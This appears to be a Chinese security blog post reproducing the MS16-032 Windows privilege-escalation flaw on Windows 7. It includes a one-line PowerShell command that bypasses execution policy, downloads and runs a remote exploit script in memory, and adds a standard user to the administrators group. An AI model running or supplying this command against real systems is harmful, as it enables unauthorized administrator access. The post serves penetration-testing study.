Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

MS16-032 提权 漏洞复现

渗透测试 Adminxe 618℃ 0评论

exploit-db的详情: https://www.exploit-db.com/exploits/39574/

注意点:此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行

此漏洞会影响以下Microsoft产品:

Windows Vista
Windows 7
Windows 8.1
Windows 10
Windows 2008 Server
Windows 2012 Server

复现测试的版本是Windows 7,其他的没有测试,可以自行进行测试;漏洞测试0x01使用标准用户登陆win7,下图是当前登录用户px的详细信息

0x02在powershell里面,直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators px /add'" 

0x03下面就是见证奇迹的时刻了

漏洞利用成功,有好几种方式,这只是其中一种。下面也是一种权限提升的方式,简单写一下脚本的下载下载地址:https://www.exploit-db.com/exploits/39719/

转载请注明:Adminxe's Blog » MS16-032 提权 漏洞复现

喜欢 (26)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址